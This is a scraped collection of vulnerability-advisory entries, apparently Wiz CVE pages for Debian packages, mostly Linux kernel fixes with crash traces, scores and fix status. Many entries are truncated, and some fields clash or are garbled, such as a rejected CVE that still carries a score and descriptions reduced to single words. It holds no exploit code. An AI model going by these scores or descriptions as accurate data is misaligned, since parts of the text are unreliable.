Imported dma-bufs also have obj->resv != &obj->_resv. So we should
check both this condition in addition to flags for handling the
_NO_SHARE case.
Fixes this splat that was reported with IRIS video playback:
------------[ cut here ]------------
WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm]
CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT
pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
pc : msm_gem_free_object+0x1f8/0x264 [msm]
lr : msm_gem_free_object+0x138/0x264 [msm]
sp : ffff800092a1bb30
x29: ffff
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-61635 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61635 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation ConfirmEdit. This vulnerability is associated with program files includes/FancyCaptcha/ApiFancyCaptchaReload.Php.
This issue affects ConfirmEdit: *.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 03, 2025
Echo Has Fix Added at: Nov 18, 2025
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-68754 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68754 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rtc: amlogic-a4: fix double free caused by devm
The clock obtained via devm_clk_get_enabled() is automatically managed
by devres and will be disabled and freed on driver detach. Manually
calling clk_disable_unprepare() in error path and remove function
causes double free.
Remove the redundant clk_disable_unprepare() calls from the probe
error path and aml_rtc_remove(), allowing the devm framework to
automatically manage the clock lifecycle.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz (blogs_wiz) · CVSS 5.5
CVE-2026-23218 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23218 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: loongson-64bit: Fix incorrect NULL check after devm_kcalloc()
Fix incorrect NULL check in loongson_gpio_init_irqchip().
The function checks chip->parent instead of chip->irq.parents.
Source : NVD
Score 5.5
Published February 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 19, 2026
Ub
Wiz (blogs_wiz) · CVSS 5.3
CVE-2025-52534 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-52534 :
Linux Debian vulnerability analysis and mitigation
Improper bound check within AMD CPU microcode can allow a malicious guest to write to host memory, potentially resulting in loss of integrity.
Source : NVD
Score 5.3
Published February 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 29.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
CVE-2025-67858 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 7.0)
## CVE-2025-67858 : Linux Debian vulnerability analysis and mitigation
nft
Source : NVD
Score 7
Published January 8, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
foomuuri
foomuuri-firewalld
Sources
NVD
Debian 13, 14 Has Fix Added at: Jan 08, 2026
Echo Has Fix Added at: Jan 08, 2026
CVE-2026-23341 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23341 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix crash when destroying a suspended hardware context
If userspace issues an ioctl to destroy a hardware context that has
already been automatically suspended, the driver may crash because the
mailbox channel pointer is NULL for the suspended context.
Fix this by checking the mailbox channel pointer in aie2_destroy_context()
before accessing it.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
CVE-2026-5185 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-5185 : Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in Nothings stb_image up to 2.30. This affects the function stbi__gif_load_next of the file stb_image.h of the component Multi-frame GIF File Handler. The manipulation results in heap-based buffer overflow. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 4.8
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.2
CVE-2025-71155 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 7.8)
## CVE-2025-71155 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix gmap_helper_zap_one_page() again
A few checks were missing in gmap_helper_zap_one_page(), which can lead
to memory corruption in the guest under specific circumstances.
Add the missing checks.
Source : NVD
Score 7.8
Published January 23, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp
linux-gcp-6.17
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Jan 23, 20
CVE-2026-23029 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23029 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix kvm_device leak in kvm_eiointc_destroy()
In kvm_ioctl_create_device(), kvm_device has allocated memory;
kvm_device->destroy() seems to be supposed to free its kvm_device
struct, but kvm_eiointc_destroy() is not currently doing this, which
would lead to a memory leak.
So, fix it.
Source : NVD
Published January 31, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-lowlatency-hwe-6.8
linux-
CVE-2026-23433 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23433 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Fix null pointer dereference when restoring bandwidth counters
When an MSC supporting memory bandwidth monitoring is brought offline and
then online, mpam_restore_mbwu_state() calls __ris_msmon_read() via ipi to
restore the configuration of the bandwidth counters. It doesn't care about
the value read, mbwu_arg.val, and doesn't set it leading to a null pointer
dereference when __ris_msmon_read() adds to it. This results in a kernel
oops with a call trace such as:
Call trace:
__ris_msmon_read+0x19c/0x64c (P)
mpam_restore_mbwu_state+0xa0/0xe8
smp_call_on_cpu_callback+0x1c/0x38
process_one_work+0x154/0x4b4
worker_thread+0x188/0x310
kthread+0x
CVE-2025-71228 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2025-71228 : Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Score 8.4
Published February 18, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-4.15
linux-gcp-fips
Sources
NVD
Debian 11, 12 No Fix Added at: Feb 19, 2026
Debian 13, 14 Has Fix Added at: Feb 19, 2026
Echo Has Fix Added at: Feb 19, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 19, 2026
Ubuntu 22.04, 24.04, 25.10 Se
CVE-2025-71181 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.5)
## CVE-2025-71181 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: remove spin_lock() in rust_shrink_free_page()
When forward-porting Rust Binder to 6.18, I neglected to take commit
fb56fdf8b9a2 ("mm/list_lru: split the lock to per-cgroup scope") into
account, and apparently I did not end up running the shrinker callback
when I sanity tested the driver before submission. This leads to crashes
like the following:
WARNING: possible recursive locking detected
6.18.0-mainline-maybe-dirty #1 Tainted: G IO
kswapd0/68 is trying to acquire lock:
ffff956000fa18b0 (&l->lock){+.+.}-{2:2}, at: lock_list_lru_of_memcg+0x128/0x230
but task is already holding lock:
ffff956000fa18b0 (&l->lock){+.+.}-{2:2}, at: rust_h
CVE-2025-69654 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 7.5)
## CVE-2025-69654 : Linux Debian vulnerability analysis and mitigation
qjs
-m
Source : NVD
Score 7.5
Published March 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
quickjs
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Mar 10, 2026
Debian 14 Severity HIGH No Fix Added at: Mar 10, 2026
Echo Severity HIGH No Fix Added at: Mar 10, 2026
CVE-2026-22995 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 7.8)
## CVE-2026-22995 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ublk: fix use-after-free in ublk_partition_scan_work
A race condition exists between the async partition scan work and device
teardown that can lead to a use-after-free of ub->ub_disk:
ublk_ctrl_start_dev() schedules partition_scan_work after add_disk()
del_gendisk(ub->ub_disk)
ublk_detach_disk() sets ub->ub_disk = NULL
put_disk() which may free the disk
The worker ublk_partition_scan_work() then dereferences ub->ub_disk leading to UAF
Fix this by using ublk_get_disk()/ublk_put_disk() in the worker to hold
a reference to the disk during the partition scan. The spinlock in
ublk_get_disk() synchronizes with ublk_detach_disk() ensuring the worker
CVE-2026-23226 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 8.8)
## CVE-2026-23226 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: add chann_lock to protect ksmbd_chann_list xarray
ksmbd_chann_list xarray lacks synchronization, allowing use-after-free in
multi-channel sessions (between lookup_chann_list() and ksmbd_chann_del).
Adds rw_semaphore chann_lock to struct ksmbd_session and protects
all xa_load/xa_store/xa_erase accesses.
Source : NVD
Score 7.8
Published February 18, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
CVE-2026-3949 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-3949 : Linux Debian vulnerability analysis and mitigation
A vulnerability was determined in strukturag libheif up to 1.21.2. This affects the function vvdec_push_data2 of the file libheif/plugins/decoder_vvdec.cc of the component HEIF File Parser. Executing a manipulation of the argument size can lead to out-of-bounds read. The attack needs to be launched locally. The exploit has been publicly disclosed and may be utilized. This patch is called b97c8b5f198b27f375127cd597a35f2113544d03. It is advisable to implement a patch to correct this issue.
Source : NVD
Score 4.8
Published March 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
CVE-2025-71063 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 8.2)
## CVE-2025-71063 : Linux Debian vulnerability analysis and mitigation
Errands before 46.2.10 does not verify TLS certificates for CalDAV servers.
Source : NVD
Score 7.5
Published January 12, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
errands
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Jan 13, 2026
Debian 14 Severity HIGH Has Fix Added at: Jan 13, 2026
Echo Severity HIGH No Fix Added at: Jan 13, 2026
CVE-2025-48514 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 4.0)
## CVE-2025-48514 : Linux Debian vulnerability analysis and mitigation
Insufficient Granularity of Access Control in SEV firmware can allow a privileged attacker to create a SEV-ES Guest to attack SNP guest, potentially resulting in a loss of confidentiality.
Source : NVD
Score 4
Published February 10, 2026
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
CVE-2026-5316 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-5316 : Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in Nothings stb up to 1.22. The impacted element is the function setup_free of the file stb_vorbis.c. The manipulation leads to allocation of resources. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.3
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libstb
CVE-2026-5122 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-5122 : Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.
Source : NVD
Score 6.3
Published March 30, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CVE-2026-27854 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 4.8)
## CVE-2026-27854 : Linux Debian vulnerability analysis and mitigation
An attacker might be able to trigger a use-after-free by sending crafted DNS queries to a DNSdist using the DNSQuestion:getEDNSOptions method in custom Lua code. In some cases DNSQuestion:getEDNSOptions might refer to a version of the DNS packet that has been modified, thus triggering a use-after-free and potentially a crash resulting in denial of service.
Source : NVD
Score 4.8
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
CVE-2025-66002 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 6.9)
## CVE-2025-66002 : Linux Debian vulnerability analysis and mitigation
An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users to perform arbitrary unmounts via the smb4k mount helper.
Source : NVD
Score 6.9
Published January 8, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
smb4k
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 11, 2025
Debian 13, 14 Has Fix Added at: Dec 11, 2025
Echo Has Fix Added at: Dec 11, 2025
CVE-2026-23422 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23422 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dpaa2-switch: Fix interrupt storm after receiving bad if_id in IRQ handler
Commit 31a7a0bbeb00 ("dpaa2-switch: add bounds check for if_id in IRQ
handler") introduces a range check for if_id to avoid an out-of-bounds
access. If an out-of-bounds if_id is detected, the interrupt status is
not cleared. This may result in an interrupt storm.
Clear the interrupt status after detecting an out-of-bounds if_id to avoid
the problem.
Found by an experimental AI code review agent at Google.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CVE-2025-68322 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## CVE-2025-68322 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
parisc: Avoid crash due to unaligned access in unwinder
Guenter Roeck reported this kernel crash on his emulated B160L machine:
Starting network: udhcpc: started, v1.36.1
Backtrace:
[] unwind_once+0x1c/0x5c
[] walk_stackframe.isra.0+0x74/0xb8
[] arch_stack_walk+0x28/0x38
[] stack_trace_save+0x48/0x5c
[] set_track_prepare+0x44/0x6c
[] ___slab_alloc+0xfc4/0x1024
[] __slab_alloc.isra.0+0x58/0x90
[] kmem_cache_alloc_noprof+0x2ac/0x4a0
[] __anon_vma_prepare+0x60/0x280
[] __vmf_anon_prepare+0x68/0x94
[] do_wp_page+0x8cc/0xf10
[] handle_mm_fault+0x6c0/0xf08
[] do_page_fault+0x110/0x440
[] handle_interruption+0x184/0x748
[] schedule+0x4c/0x190
BUG: spinloc
CVE-2026-34353 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.9)
## CVE-2026-34353 : Linux Debian vulnerability analysis and mitigation
In OCaml through 4.14.3, Bigarray.reshape allows an integer overflow, and resultant reading of arbitrary memory, when untrusted data is processed.
Source : NVD
Score 5.9
Published March 27, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ocaml-docs
ocaml-emacs
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM Has Fix Added at: Mar 29, 2026
Red Hat
CVE-2025-61652 [LOW] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 2.7)
## CVE-2025-61652 : Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation DiscussionTools. This issue affects DiscussionTools: from * before 1.43.4, 1.44.1.
Source : NVD
Score 2.7
Published February 3, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 03, 2025
CVE-2026-2050 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-2050 : Linux Debian vulnerability analysis and mitigation
[ZDI-CAN-28266: New Vulnerability Report at rgbe.c]
Source : NVD
Published February 17, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gegl-debuginfo
gegl-devel
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Feb 16, 2026
Echo Has Fix Added at: Feb 16, 2026
CVE-2025-68318 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2025-68318 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
clk: thead: th1520-ap: set all AXI clocks to CLK_IS_CRITICAL
The AXI crossbar of TH1520 has no proper timeout handling, which means
gating AXI clocks can easily lead to bus timeout and thus system hang.
Set all AXI clock gates to CLK_IS_CRITICAL. All these clock gates are
ungated by default on system reset.
In addition, convert all current CLK_IGNORE_UNUSED usage to
CLK_IS_CRITICAL to prevent unwanted clock gating.
Source : NVD
Score 5.5
Published December 16, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
CVE-2026-23428 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## CVE-2026-23428 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free of share_conf in compound request
smb2_get_ksmbd_tcon() reuses work->tcon in compound requests without
validating tcon->t_state. ksmbd_tree_conn_lookup() checks t_state ==
TREE_CONNECTED on the initial lookup path, but the compound reuse path
bypasses this check entirely.
If a prior command in the compound (SMB2_TREE_DISCONNECT) sets t_state
to TREE_DISCONNECTED and frees share_conf via ksmbd_share_config_put(),
subsequent commands dereference the freed share_conf through
work->tcon->share_conf.
KASAN report:
[ 4.144653] ==================================================================
[ 4.145059] BUG: KASAN: slab-use-a
CVE-2026-2245 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 4.8)
## CVE-2026-2245 : Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in CCExtractor up to 183. This affects the function parse_PAT/parse_PMT in the library src/lib_ccx/ts_tables.c of the component MPEG-TS File Parser. Such manipulation leads to out-of-bounds read. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The name of the patch is fd7271bae238ccb3ae8a71304ea64f0886324925. It is best practice to apply a patch to resolve this issue.
Source : NVD
Score 4.8
Published February 9, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
CVE-2026-23426 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23426 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/logicvc: Fix device node reference leak in logicvc_drm_config_parse()
The logicvc_drm_config_parse() function calls of_get_child_by_name() to
find the "layers" node but fails to release the reference, leading to a
device node reference leak.
Fix this by using the __free(device_node) cleanup attribute to automatically
release the reference when the variable goes out of scope.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
CVE-2026-23410 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 7.8)
## CVE-2026-23410 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix race on rawdata dereference
There is a race condition that leads to a use-after-free situation:
because the rawdata inodes are not refcounted, an attacker can start
open()ing one of the rawdata files, and at the same time remove the
last reference to this rawdata (by removing the corresponding profile,
for example), which frees its struct aa_loaddata; as a result, when
seq_rawdata_open() is reached, i_private is a dangling pointer and
freed memory is accessed.
The rawdata inodes weren't refcounted to avoid a circular refcount and
were supposed to be held by the profile rawdata reference. However
during profile removal there is a windo
CVE-2022-50734 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2022-50734 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nvmem: core: Fix memleak in nvmem_register()
dev_set_name() will allocate memory for nvmem->dev.kobj.name in
nvmem_register(); when nvmem_validate_keepouts() fails, nvmem's
memory is freed and the function returns, but nobody frees the memory
for nvmem->dev.kobj.name, so there is a memleak. So move
nvmem_validate_keepouts() after device_register() and let
the device core deal with cleaning up the name in error cases.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
CVE-2025-14946 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 4.8)
## CVE-2025-14946 : Linux Debian vulnerability analysis and mitigation
A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd.
Source : NVD
Score 4.8
Published December 19, 2025
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
CVE-2026-31396 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## CVE-2026-31396 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix use-after-free access to PTP clock
PTP clock is registered on every opening of the interface and destroyed on
every closing. However it may be accessed via get_ts_info ethtool call
which is possible while the interface is just present in the kernel.
BUG: KASAN: use-after-free in ptp_clock_index+0x47/0x50 drivers/ptp/ptp_clock.c:426
Read of size 4 at addr ffff8880194345cc by task syz.0.6/948
CPU: 1 PID: 948 Comm: syz.0.6 Not tainted 6.1.164+ #109
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014
Call Trace: __dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x8d/0xb
CVE-2026-23403 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2026-23403 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix memory leak in verify_header
*ns = NULL
Remove the incorrect assignment.
The caller (aa_unpack) initializes *ns to NULL once before the loop,
which is sufficient.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-hwe
linux-hwe-5.4
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Apr 02, 2026
Echo Has Fix Added at: Apr 02, 2026
Ubuntu 16.04 Severity
CVE-2023-53838 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz · CVSS 5.3)
## CVE-2023-53838 : Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: synchronize atomic write aborts
To fix a race condition between atomic write aborts, I use the inode
lock and make the COW inode re-usable throughout the whole
atomic file inode lifetime.
Source : NVD
Published December 9, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
